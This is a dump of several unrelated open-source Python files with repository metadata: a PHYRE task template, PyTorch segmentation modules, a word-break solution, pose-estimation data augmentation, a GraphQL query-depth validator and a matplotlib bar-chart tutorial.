# unlikely. See also _BuildArgList()
if (arg + 1) % 5 == 0:
strval = strval + "\n"
if is_comment:
strval = strval + "#"
strval = strval + "\t\t\t"
strval = strval + ", " + argName
if defArgVal:
strval = strval + "=" + defArgVal
if numOptArgs == -1:
strval = strval + ", *" + names[-1]
return strval
if __name__ == "__main__":
print("Use 'makepy.py' to generate Python code - this module is just a helper")
|
f32e1e3a07f9e9f4b49c078e94dbf59ea61767be
|
fd51c0e7d532b164b58c69e36d196c59cbdac6ff
|
/data/task_scripts/main/task00002.py
|
6dc06e62e1db44b37828b093d30efeb57bea21d5
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
facebookresearch/phyre
|
18fa1db4271fba922b1372610abac718d8833927
|
d0765dd2f6d6cf41b933a3a57173c63d21fbfa6a
|
refs/heads/main
| 2023-08-24T13:54:34.500729
| 2022-04-20T22:46:08
| 2022-04-20T22:46:08
| 192,634,486
| 462
| 76
|
Apache-2.0
| 2023-07-08T03:40:59
| 2019-06-19T01:12:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,963
|
py
|
task00002.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Template task with a ball that should avoid an obstacle bar to hit ground."""
import phyre.creator as creator_lib
__OBSTACLE_WIDTHS = [val * 0.1 for val in range(1, 8)]
__OBSTACLE_YS = [val * 0.1 for val in range(3, 8)]
__OBSTACLE_XS = [val * 0.1 for val in range(0, 11)]
@creator_lib.define_task_template(
obstacle_width=__OBSTACLE_WIDTHS,
obstacle_x=__OBSTACLE_XS,
obstacle_y=__OBSTACLE_YS,
search_params=dict(
required_flags=['BALL:GOOD_STABLE'],
excluded_flags=['BALL:TRIVIAL'],
diversify_tier='ball'
),
max_tasks=100)
def build_task(C, obstacle_width, obstacle_x, obstacle_y):
# Add obstacle.
if obstacle_x + obstacle_width > 1.:
raise creator_lib.SkipTemplateParams
obstacle_x *= C.scene.width
obstacle_y *= C.scene.height
obstacle = C.add('static bar', scale=obstacle_width) \
.set_left(obstacle_x) \
.set_bottom(obstacle_y)
# Add ball centered on top of obstacle.
ball = C.add('dynamic ball', scale=0.1) \
.set_center_x(obstacle_x + obstacle.width / 2.) \
.set_bottom(0.9 * C.scene.height)
bottom_wall = C.add('static bar', 1, bottom=0, left=0)
# Create assignment.
C.update_task(
body1=ball,
body2=bottom_wall,
relationships=[C.SpatialRelationship.TOUCHING])
C.set_meta(C.SolutionTier.BALL)
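# Note: the template above enumerates up to 7 * 11 * 5 = 385 parameter
# combinations; SkipTemplateParams prunes bars that would extend past the scene,
# and max_tasks=100 caps how many of the remaining tasks are kept.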
|
2b9c68c1476e525d2926fec980cf36ed156e9e5e
|
8bb21974ad267f52bb97ea82db6b57ee87482cbc
|
/core/nn/basic.py
|
c02cab5a3b765b9954a2e4bf8ceb3f23b653ff19
|
[
"Apache-2.0"
] |
permissive
|
Tramac/awesome-semantic-segmentation-pytorch
|
f1f20ed45a1caa016d3ef06225d06093b8a5d7ca
|
d37d2a17221d2681ad454958cf06a1065e9b1f7f
|
refs/heads/master
| 2023-08-29T06:20:59.816176
| 2023-01-04T08:24:27
| 2023-01-04T08:24:27
| 174,904,616
| 2,762
| 627
|
Apache-2.0
| 2023-01-04T08:24:28
| 2019-03-11T01:33:25
|
Python
|
UTF-8
|
Python
| false
| false
| 5,079
|
py
|
basic.py
|
"""Basic Module for Semantic Segmentation"""
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['_ConvBNPReLU', '_ConvBN', '_BNPReLU', '_ConvBNReLU', '_DepthwiseConv', 'InvertedResidual']
class _ConvBNReLU(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, relu6=False, norm_layer=nn.BatchNorm2d, **kwargs):
super(_ConvBNReLU, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)
self.bn = norm_layer(out_channels)
self.relu = nn.ReLU6(True) if relu6 else nn.ReLU(True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
class _ConvBNPReLU(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, norm_layer=nn.BatchNorm2d, **kwargs):
super(_ConvBNPReLU, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)
self.bn = norm_layer(out_channels)
self.prelu = nn.PReLU(out_channels)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.prelu(x)
return x
class _ConvBN(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, norm_layer=nn.BatchNorm2d, **kwargs):
super(_ConvBN, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)
self.bn = norm_layer(out_channels)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
class _BNPReLU(nn.Module):
def __init__(self, out_channels, norm_layer=nn.BatchNorm2d, **kwargs):
super(_BNPReLU, self).__init__()
self.bn = norm_layer(out_channels)
self.prelu = nn.PReLU(out_channels)
def forward(self, x):
x = self.bn(x)
x = self.prelu(x)
return x
# -----------------------------------------------------------------
# For PSPNet
# -----------------------------------------------------------------
class _PSPModule(nn.Module):
def __init__(self, in_channels, sizes=(1, 2, 3, 6), **kwargs):
super(_PSPModule, self).__init__()
out_channels = int(in_channels / 4)
self.avgpools = nn.ModuleList()
self.convs = nn.ModuleList()
for size in sizes:
            self.avgpools.append(nn.AdaptiveAvgPool2d(size))
self.convs.append(_ConvBNReLU(in_channels, out_channels, 1, **kwargs))
def forward(self, x):
size = x.size()[2:]
feats = [x]
        for avgpool, conv in zip(self.avgpools, self.convs):
feats.append(F.interpolate(conv(avgpool(x)), size, mode='bilinear', align_corners=True))
return torch.cat(feats, dim=1)
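# Usage sketch for _PSPModule (shapes are illustrative): the module concatenates
# the input with four pooled-and-upsampled branches of C/4 channels each, so C
# input channels become 2*C output channels:
#
#   psp = _PSPModule(in_channels=2048)
#   y = psp(torch.randn(1, 2048, 16, 16))  # -> torch.Size([1, 4096, 16, 16])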
# -----------------------------------------------------------------
# For MobileNet
# -----------------------------------------------------------------
class _DepthwiseConv(nn.Module):
"""conv_dw in MobileNet"""
def __init__(self, in_channels, out_channels, stride, norm_layer=nn.BatchNorm2d, **kwargs):
super(_DepthwiseConv, self).__init__()
self.conv = nn.Sequential(
_ConvBNReLU(in_channels, in_channels, 3, stride, 1, groups=in_channels, norm_layer=norm_layer),
_ConvBNReLU(in_channels, out_channels, 1, norm_layer=norm_layer))
def forward(self, x):
return self.conv(x)
# -----------------------------------------------------------------
# For MobileNetV2
# -----------------------------------------------------------------
class InvertedResidual(nn.Module):
def __init__(self, in_channels, out_channels, stride, expand_ratio, norm_layer=nn.BatchNorm2d, **kwargs):
super(InvertedResidual, self).__init__()
assert stride in [1, 2]
self.use_res_connect = stride == 1 and in_channels == out_channels
layers = list()
inter_channels = int(round(in_channels * expand_ratio))
if expand_ratio != 1:
# pw
layers.append(_ConvBNReLU(in_channels, inter_channels, 1, relu6=True, norm_layer=norm_layer))
layers.extend([
# dw
_ConvBNReLU(inter_channels, inter_channels, 3, stride, 1,
groups=inter_channels, relu6=True, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(inter_channels, out_channels, 1, bias=False),
norm_layer(out_channels)])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
if __name__ == '__main__':
x = torch.randn(1, 32, 64, 64)
model = InvertedResidual(32, 64, 2, 1)
out = model(x)
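    # A quick extra shape check for _PSPModule (a sketch; assumes the
    # 32-channel input created above).
    psp = _PSPModule(32)
    psp_out = psp(x)
    print(out.shape, psp_out.shape)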
|
1afeb019c80753a5b262c2cf05db5ccc19ab85e2
|
3779caa500c53f0ee12baa039cda4cde1e7391b9
|
/Word Break.py
|
531b91df28756cdcaf4e98290c8612f6ab573cc2
|
[] |
no_license
|
kongzhidea/leetcode
|
924d66bcbc8b7b0f793399184870d4f8da309dba
|
57fc31718ee9cd6a4282c752382e538e42ff02ce
|
refs/heads/master
| 2021-10-29T07:07:41.603363
| 2021-10-27T13:49:29
| 2021-10-27T13:49:29
| 63,241,496
| 125
| 2
| null | null | null | null |
GB18030
|
Python
| false
| false
| 513
|
py
|
Word Break.py
|
class Solution:
# @param s, a string
# @param dict, a set of string
# @return a boolean
def wordBreak(self, s, dict):
n = len(s)
        f = [0] * n  # f[i] == 1 means the prefix s[0:i+1] can be segmented using dict
for i in xrange(n):
if s[0:i+1] in dict:
f[i] = 1
if f[i] == 1:
continue
for j in xrange(i):
if f[j] == 1:
if s[j+1:i+1] in dict:
f[i] = 1
return f[n-1] == 1
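# Illustrative trace (a sketch, not part of the original solution):
# Solution().wordBreak("leetcode", {"leet", "code"}) sets f[3] = 1 because
# s[0:4] == "leet" is in dict, then f[7] = 1 because f[3] == 1 and
# s[4:8] == "code" is in dict, so the call returns True.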
|
be22892eeaa8049bf9a1919792cff0b5d310c041
|
42fe96c0a0c55c1f8428a3c856b40ccce74b6173
|
/multi_obj_pose_estimation/image_multi.py
|
e26348329b65cfcf61f75ec4662430188ebd0bc3
|
[
"MIT"
] |
permissive
|
microsoft/singleshotpose
|
4a8a1da8087ab6a0bc13a54d263e31b26b3a75a5
|
2c282619101f9f31666dd18b42393375bea1600f
|
refs/heads/master
| 2023-08-25T19:40:50.381498
| 2022-11-28T19:11:09
| 2022-11-28T19:11:09
| 139,270,056
| 475
| 138
|
MIT
| 2022-11-28T19:11:10
| 2018-06-30T18:09:05
|
Python
|
UTF-8
|
Python
| false
| false
| 14,148
|
py
|
image_multi.py
|
#!/usr/bin/python
# encoding: utf-8
import random
import os
from PIL import Image, ImageChops, ImageMath
import numpy as np
def get_add_objs(objname):
# Decide how many additional objects you will augment and what will be the other types of objects
if objname == 'ape':
add_objs = ['can', 'cat', 'duck', 'glue', 'holepuncher', 'iron', 'phone'] # eggbox
elif objname == 'benchvise':
add_objs = ['ape', 'can', 'cat', 'driller', 'duck', 'glue', 'holepuncher']
elif objname == 'cam':
add_objs = ['ape', 'benchvise', 'can', 'cat', 'driller', 'duck', 'holepuncher']
elif objname == 'can':
add_objs = ['ape', 'benchvise', 'cat', 'driller', 'duck', 'eggbox', 'holepuncher']
elif objname == 'cat':
add_objs = ['ape', 'can', 'duck', 'glue', 'holepuncher', 'eggbox', 'phone']
elif objname == 'driller':
add_objs = ['ape', 'benchvise', 'can', 'cat', 'duck', 'glue', 'holepuncher']
elif objname == 'duck':
add_objs = ['ape', 'can', 'cat', 'eggbox', 'glue', 'holepuncher', 'phone']
elif objname == 'eggbox':
add_objs = ['ape', 'benchvise', 'cam', 'can', 'cat', 'duck', 'glue', 'holepuncher']
elif objname == 'glue':
add_objs = ['ape', 'benchvise', 'cam', 'driller', 'duck', 'eggbox', 'holepuncher' ]
elif objname == 'holepuncher':
add_objs = ['benchvise', 'cam', 'can', 'cat', 'driller', 'duck', 'eggbox']
elif objname == 'iron':
add_objs = ['ape', 'benchvise', 'can', 'cat', 'driller', 'duck', 'glue']
elif objname == 'lamp':
add_objs = ['ape', 'benchvise', 'can', 'driller', 'eggbox', 'holepuncher', 'iron']
elif objname == 'phone':
add_objs = ['ape', 'benchvise', 'cam', 'can', 'driller', 'duck', 'holepuncher']
return add_objs
def mask_background(img, mask):
ow, oh = img.size
imcs = list(img.split())
maskcs = list(mask.split())
fics = list(Image.new(img.mode, img.size).split())
for c in range(len(imcs)):
posmask = maskcs[c].point(lambda i: i / 255)
fics[c] = ImageMath.eval("a * c", a=imcs[c], c=posmask).convert('L')
out = Image.merge(img.mode, tuple(fics))
return out
def scale_image_channel(im, c, v):
cs = list(im.split())
cs[c] = cs[c].point(lambda i: i * v)
out = Image.merge(im.mode, tuple(cs))
return out
def distort_image(im, hue, sat, val):
im = im.convert('HSV')
cs = list(im.split())
cs[1] = cs[1].point(lambda i: i * sat)
cs[2] = cs[2].point(lambda i: i * val)
def change_hue(x):
x += hue*255
if x > 255:
x -= 255
if x < 0:
x += 255
return x
cs[0] = cs[0].point(change_hue)
im = Image.merge(im.mode, tuple(cs))
im = im.convert('RGB')
return im
def rand_scale(s):
scale = random.uniform(1, s)
if(random.randint(1,10000)%2):
return scale
return 1./scale
def random_distort_image(im, hue, saturation, exposure):
dhue = random.uniform(-hue, hue)
dsat = rand_scale(saturation)
dexp = rand_scale(exposure)
res = distort_image(im, dhue, dsat, dexp)
return res
def data_augmentation(img, shape, jitter, hue, saturation, exposure):
oh = img.height
ow = img.width
    dw = int(ow * jitter)
    dh = int(oh * jitter)
pleft = random.randint(-dw, dw)
pright = random.randint(-dw, dw)
ptop = random.randint(-dh, dh)
pbot = random.randint(-dh, dh)
swidth = ow - pleft - pright
sheight = oh - ptop - pbot
sx = float(swidth) / ow
sy = float(sheight) / oh
flip = random.randint(1,10000)%2
cropped = img.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
dx = (float(pleft)/ow)/sx
dy = (float(ptop) /oh)/sy
sized = cropped.resize(shape)
if flip:
sized = sized.transpose(Image.FLIP_LEFT_RIGHT)
img = random_distort_image(sized, hue, saturation, exposure)
    return img, flip, dx, dy, sx, sy
def fill_truth_detection(labpath, w, h, flip, dx, dy, sx, sy, num_keypoints, max_num_gt):
num_labels = 2*num_keypoints+3 # +2 for width, height, +1 for class label
label = np.zeros((max_num_gt,num_labels))
if os.path.getsize(labpath):
bs = np.loadtxt(labpath)
if bs is None:
return label
bs = np.reshape(bs, (-1, num_labels))
cc = 0
for i in range(bs.shape[0]):
xs = list()
ys = list()
for j in range(num_keypoints):
xs.append(bs[i][2*j+1])
ys.append(bs[i][2*j+2])
# Make sure the centroid of the object/hand is within image
xs[0] = min(0.999, max(0, xs[0] * sx - dx))
ys[0] = min(0.999, max(0, ys[0] * sy - dy))
for j in range(1,num_keypoints):
xs[j] = xs[j] * sx - dx
ys[j] = ys[j] * sy - dy
for j in range(num_keypoints):
bs[i][2*j+1] = xs[j]
bs[i][2*j+2] = ys[j]
            min_x = min(xs)
            max_x = max(xs)
            min_y = min(ys)
            max_y = max(ys)
            bs[i][2*num_keypoints+1] = max_x - min_x
            bs[i][2*num_keypoints+2] = max_y - min_y
label[cc] = bs[i]
cc += 1
if cc >= max_num_gt:
break
label = np.reshape(label, (-1))
return label
def change_background(img, mask, bg):
ow, oh = img.size
bg = bg.resize((ow, oh)).convert('RGB')
imcs = list(img.split())
bgcs = list(bg.split())
maskcs = list(mask.split())
fics = list(Image.new(img.mode, img.size).split())
for c in range(len(imcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i / 255)
fics[c] = ImageMath.eval("a * c + b * d", a=imcs[c], b=bgcs[c], c=posmask, d=negmask).convert('L')
out = Image.merge(img.mode, tuple(fics))
return out
def shifted_data_augmentation_with_mask(img, mask, shape, jitter, hue, saturation, exposure):
ow, oh = img.size
    dw = int(ow * jitter)
    dh = int(oh * jitter)
pleft = random.randint(-dw, dw)
pright = random.randint(-dw, dw)
ptop = random.randint(-dh, dh)
pbot = random.randint(-dh, dh)
swidth = ow - pleft - pright
sheight = oh - ptop - pbot
sx = float(swidth) / ow
sy = float(sheight) / oh
flip = random.randint(1,10000)%2
cropped = img.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
mask_cropped = mask.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
cw, ch = cropped.size
shift_x = random.randint(-80, 80)
shift_y = random.randint(-80, 80)
dx = (float(pleft)/ow)/sx - (float(shift_x)/shape[0]) # FIX HERE
dy = (float(ptop) /oh)/sy - (float(shift_y)/shape[1]) # FIX HERE
# dx = (float(pleft)/ow)/sx - (float(shift_x)/ow)
# dy = (float(ptop) /oh)/sy - (float(shift_y)/oh)
sized = cropped.resize(shape)
mask_sized = mask_cropped.resize(shape)
sized = ImageChops.offset(sized, shift_x, shift_y)
mask_sized = ImageChops.offset(mask_sized, shift_x, shift_y)
if flip:
sized = sized.transpose(Image.FLIP_LEFT_RIGHT)
mask_sized = mask_sized.transpose(Image.FLIP_LEFT_RIGHT)
img = sized
mask = mask_sized
    return img, mask, flip, dx, dy, sx, sy
def data_augmentation_with_mask(img, mask, shape, jitter, hue, saturation, exposure):
ow, oh = img.size
    dw = int(ow * jitter)
    dh = int(oh * jitter)
pleft = random.randint(-dw, dw)
pright = random.randint(-dw, dw)
ptop = random.randint(-dh, dh)
pbot = random.randint(-dh, dh)
swidth = ow - pleft - pright
sheight = oh - ptop - pbot
sx = float(swidth) / ow
sy = float(sheight) / oh
flip = random.randint(1,10000)%2
cropped = img.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
mask_cropped = mask.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
dx = (float(pleft)/ow)/sx
dy = (float(ptop) /oh)/sy
sized = cropped.resize(shape)
mask_sized = mask_cropped.resize(shape)
if flip:
sized = sized.transpose(Image.FLIP_LEFT_RIGHT)
mask_sized = mask_sized.transpose(Image.FLIP_LEFT_RIGHT)
img = sized
mask = mask_sized
    return img, mask, flip, dx, dy, sx, sy
def superimpose_masked_imgs(masked_img, mask, total_mask):
ow, oh = masked_img.size
total_mask = total_mask.resize((ow, oh)).convert('RGB')
imcs = list(masked_img.split())
bgcs = list(total_mask.split())
maskcs = list(mask.split())
fics = list(Image.new(masked_img.mode, masked_img.size).split())
for c in range(len(imcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i / 255)
fics[c] = ImageMath.eval("a * c + b * d", a=imcs[c], b=bgcs[c], c=posmask, d=negmask).convert('L')
out = Image.merge(masked_img.mode, tuple(fics))
return out
def superimpose_masks(mask, total_mask):
# bg: total_mask
ow, oh = mask.size
total_mask = total_mask.resize((ow, oh)).convert('RGB')
total_maskcs = list(total_mask.split())
maskcs = list(mask.split())
fics = list(Image.new(mask.mode, mask.size).split())
for c in range(len(maskcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i)
fics[c] = ImageMath.eval("c + b * d", b=total_maskcs[c], c=posmask, d=negmask).convert('L')
out = Image.merge(mask.mode, tuple(fics))
return out
def augment_objects(imgpath, objname, add_objs, shape, jitter, hue, saturation, exposure, num_keypoints, max_num_gt):
pixelThreshold = 200
num_labels = 2*num_keypoints+3
random.shuffle(add_objs)
labpath = imgpath.replace('images', 'labels').replace('JPEGImages', 'labels').replace('.jpg', '.txt').replace('.png','.txt')
maskpath = imgpath.replace('JPEGImages', 'mask').replace('/00', '/').replace('.jpg', '.png')
# Read the image and the mask
img = Image.open(imgpath).convert('RGB')
iw, ih = img.size
mask = Image.open(maskpath).convert('RGB')
img,mask,flip,dx,dy,sx,sy = shifted_data_augmentation_with_mask(img, mask, shape, jitter, hue, saturation, exposure)
label = fill_truth_detection(labpath, iw, ih, flip, dx, dy, 1./sx, 1./sy, num_keypoints, max_num_gt)
total_label = np.reshape(label, (-1, num_labels))
# Mask the background
masked_img = mask_background(img, mask)
mask = mask.resize(shape)
masked_img = masked_img.resize(shape)
# Initialize the total mask and total masked image
total_mask = mask
total_masked_img = masked_img
count = 1
for obj in add_objs:
successful = False
while not successful:
objpath = '../LINEMOD/' + obj + '/train.txt'
with open(objpath, 'r') as objfile:
objlines = objfile.readlines()
rand_index = random.randint(0, len(objlines) - 1)
obj_rand_img_path = '../' + objlines[rand_index].rstrip()
obj_rand_mask_path = obj_rand_img_path.replace('JPEGImages', 'mask').replace('/00', '/').replace('.jpg', '.png')
obj_rand_lab_path = obj_rand_img_path.replace('images', 'labels').replace('JPEGImages', 'labels').replace('.jpg', '.txt').replace('.png','.txt')
obj_rand_img = Image.open(obj_rand_img_path).convert('RGB')
obj_rand_mask = Image.open(obj_rand_mask_path).convert('RGB')
obj_rand_masked_img = mask_background(obj_rand_img, obj_rand_mask)
obj_rand_masked_img,obj_rand_mask,flip,dx,dy,sx,sy = data_augmentation_with_mask(obj_rand_masked_img, obj_rand_mask, shape, jitter, hue, saturation, exposure)
obj_rand_label = fill_truth_detection(obj_rand_lab_path, iw, ih, flip, dx, dy, 1./sx, 1./sy, num_keypoints, max_num_gt)
# compute intersection (ratio of the object part intersecting with other object parts over the area of the object)
xx = np.array(obj_rand_mask)
xx = np.where(xx > pixelThreshold, 1, 0)
yy = np.array(total_mask)
yy = np.where(yy > pixelThreshold, 1, 0)
intersection = (xx * yy)
            if np.sum(xx) == 0:  # skip if the augmented object mask is empty
successful = False
continue
intersection_ratio = float(np.sum(intersection)) / float(np.sum(xx))
if intersection_ratio < 0.2:
successful = True
total_mask = superimpose_masks(obj_rand_mask, total_mask) # total_mask + obj_rand_mask
total_masked_img = superimpose_masked_imgs(obj_rand_masked_img, obj_rand_mask, total_masked_img) # total_masked_img + obj_rand_masked_img
obj_rand_label = np.reshape(obj_rand_label, (-1, num_labels))
total_label[count, :] = obj_rand_label[0, :]
count = count + 1
else:
successful = False
total_masked_img = superimpose_masked_imgs(masked_img, mask, total_masked_img)
return total_masked_img, np.reshape(total_label, (-1)), total_mask
def load_data_detection(imgpath, shape, jitter, hue, saturation, exposure, bgpath, num_keypoints, max_num_gt):
# Read the background image
bg = Image.open(bgpath).convert('RGB')
# Understand which object it is and get the neighboring objects
dirname = os.path.dirname(os.path.dirname(imgpath)) ## dir of dir of file
objname = os.path.basename(dirname)
add_objs = get_add_objs(objname)
# Add additional objects in the scene, apply data augmentation on the objects
total_masked_img, label, total_mask = augment_objects(imgpath, objname, add_objs, shape, jitter, hue, saturation, exposure, num_keypoints, max_num_gt)
img = change_background(total_masked_img, total_mask, bg)
    return img, label
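# A minimal usage sketch (not part of the original module); the paths and
# parameter values are hypothetical and assume the '../LINEMOD/<object>/...'
# layout that augment_objects() expects:
#
#     img, label = load_data_detection(
#         '../LINEMOD/ape/JPEGImages/000000.jpg',
#         shape=(416, 416), jitter=0.2, hue=0.1, saturation=1.5,
#         exposure=1.5, bgpath='path/to/background.jpg',
#         num_keypoints=9, max_num_gt=50)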
|
523ed78ab472dc923f58eab7dcfc9a5d729296c0
|
fda6a1be714d8e27a5d8dd3df795df45538f2fe7
|
/graphene/validation/depth_limit.py
|
e0f286634fa19b08129ff9a81fe0d5f952884250
|
[
"MIT"
] |
permissive
|
graphql-python/graphene
|
6badaaa97c8ad78552a656f9da9ed577cfc37add
|
93cb33d359bf2109d1b81eaeaf052cdb06f93f49
|
refs/heads/master
| 2023-08-05T02:48:36.967050
| 2023-07-26T07:43:40
| 2023-07-26T07:43:40
| 43,056,951
| 8,187
| 1,088
|
MIT
| 2023-09-01T19:59:19
| 2015-09-24T09:18:18
|
Python
|
UTF-8
|
Python
| false
| false
| 6,504
|
py
|
depth_limit.py
|
# This is a Python port of https://github.com/stems/graphql-depth-limit
# which is licensed under the terms of the MIT license, reproduced below.
#
# -----------
#
# MIT License
#
# Copyright (c) 2017 Stem
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
try:
from re import Pattern
except ImportError:
# backwards compatibility for v3.6
from typing import Pattern
from typing import Callable, Dict, List, Optional, Union, Tuple
from graphql import GraphQLError
from graphql.validation import ValidationContext, ValidationRule
from graphql.language import (
DefinitionNode,
FieldNode,
FragmentDefinitionNode,
FragmentSpreadNode,
InlineFragmentNode,
Node,
OperationDefinitionNode,
)
from ..utils.is_introspection_key import is_introspection_key
IgnoreType = Union[Callable[[str], bool], Pattern, str]
def depth_limit_validator(
max_depth: int,
ignore: Optional[List[IgnoreType]] = None,
callback: Optional[Callable[[Dict[str, int]], None]] = None,
):
class DepthLimitValidator(ValidationRule):
def __init__(self, validation_context: ValidationContext):
document = validation_context.document
definitions = document.definitions
fragments = get_fragments(definitions)
queries = get_queries_and_mutations(definitions)
query_depths = {}
for name in queries:
query_depths[name] = determine_depth(
node=queries[name],
fragments=fragments,
depth_so_far=0,
max_depth=max_depth,
context=validation_context,
operation_name=name,
ignore=ignore,
)
if callable(callback):
callback(query_depths)
super().__init__(validation_context)
return DepthLimitValidator
def get_fragments(
definitions: Tuple[DefinitionNode, ...],
) -> Dict[str, FragmentDefinitionNode]:
fragments = {}
for definition in definitions:
if isinstance(definition, FragmentDefinitionNode):
fragments[definition.name.value] = definition
return fragments
# This will actually get both queries and mutations.
# We can basically treat those the same
def get_queries_and_mutations(
definitions: Tuple[DefinitionNode, ...],
) -> Dict[str, OperationDefinitionNode]:
operations = {}
for definition in definitions:
if isinstance(definition, OperationDefinitionNode):
operation = definition.name.value if definition.name else "anonymous"
operations[operation] = definition
return operations
def determine_depth(
node: Node,
fragments: Dict[str, FragmentDefinitionNode],
depth_so_far: int,
max_depth: int,
context: ValidationContext,
operation_name: str,
ignore: Optional[List[IgnoreType]] = None,
) -> int:
if depth_so_far > max_depth:
context.report_error(
GraphQLError(
f"'{operation_name}' exceeds maximum operation depth of {max_depth}.",
[node],
)
)
return depth_so_far
if isinstance(node, FieldNode):
should_ignore = is_introspection_key(node.name.value) or is_ignored(
node, ignore
)
if should_ignore or not node.selection_set:
return 0
return 1 + max(
map(
lambda selection: determine_depth(
node=selection,
fragments=fragments,
depth_so_far=depth_so_far + 1,
max_depth=max_depth,
context=context,
operation_name=operation_name,
ignore=ignore,
),
node.selection_set.selections,
)
)
elif isinstance(node, FragmentSpreadNode):
return determine_depth(
node=fragments[node.name.value],
fragments=fragments,
depth_so_far=depth_so_far,
max_depth=max_depth,
context=context,
operation_name=operation_name,
ignore=ignore,
)
elif isinstance(
node, (InlineFragmentNode, FragmentDefinitionNode, OperationDefinitionNode)
):
return max(
map(
lambda selection: determine_depth(
node=selection,
fragments=fragments,
depth_so_far=depth_so_far,
max_depth=max_depth,
context=context,
operation_name=operation_name,
ignore=ignore,
),
node.selection_set.selections,
)
)
else:
raise Exception(
f"Depth crawler cannot handle: {node.kind}."
) # pragma: no cover
def is_ignored(node: FieldNode, ignore: Optional[List[IgnoreType]] = None) -> bool:
if ignore is None:
return False
for rule in ignore:
field_name = node.name.value
if isinstance(rule, str):
if field_name == rule:
return True
elif isinstance(rule, Pattern):
if rule.match(field_name):
return True
elif callable(rule):
if rule(field_name):
return True
else:
raise ValueError(f"Invalid ignore option: {rule}.")
return False
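# A minimal usage sketch (not part of the original module), assuming a
# graphene `schema` object and a `query_string` to check before execution:
#
#     from graphql import parse, validate
#
#     errors = validate(
#         schema.graphql_schema,
#         parse(query_string),
#         rules=(depth_limit_validator(max_depth=10),),
#     )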
|
008da3d6bd94988f02960e16f766d460cf91482d
|
767c07db1fb131047af3d9b0a065b8fdc8aac9ab
|
/73-mpl/mpl_bar.py
|
94ddfef81b6bbbfb9ef6d813cdc02e43525160fc
|
[] |
no_license
|
DUanalytics/pyAnalytics
|
e52c5469da30a5f436ec0f3120d9f15fb82fd9b3
|
107a08bebe46ea51afccfeae4a666213bb405d41
|
refs/heads/master
| 2023-07-08T04:32:54.758902
| 2023-07-03T14:37:04
| 2023-07-03T14:37:04
| 202,094,535
| 394
| 31
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,737
|
py
|
mpl_bar.py
|
#MPL - graph with titles
#Graph and Plots
#-----------------------------
#%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.bar(['M','F'], [30,10])
plt.barh(['M','F'], [30,10])
plt.bar(['M','F'], [30,10], color = ['r', 'g'])
#with other options : run together till plt.show
plt.bar(['M','F'], [30,10], color = ['r', 'g'])
plt.title("Student Proportion")
plt.grid(True)
plt.show(); #used if running as file
#now create a dataframe object
df = pd.DataFrame({'gender':['M','F'], 'strength':[25,10]})
df
df.plot(kind='bar') #legend, labels ?
#save in object
ax = df.plot(kind='bar', grid=True, legend=True, title=' Title of Graph', figsize=[10,5])
ax.set_xlabel('Gender')
ax.set_ylabel('Strength')
#M2
plt.bar(df.gender, df.strength) #use column names
plt.bar(df.gender, df.strength, color = ['red','g']) #list color
plt.bar(df.gender, df.strength, color = ('red','g')) #tuple color
#complete plot
plt.bar(df.gender, df.strength, color = ['red','g'])
plt.title('Str of Students')
plt.grid(True)
plt.xlabel('Gender')
plt.ylabel('Count')
plt.xticks(df.gender,rotation=45,fontsize=20)
plt.yticks([0,5,10,15,20,25,30],rotation=45,fontsize=20)
plt.show()
#what if both columns are numeric
# x axis values
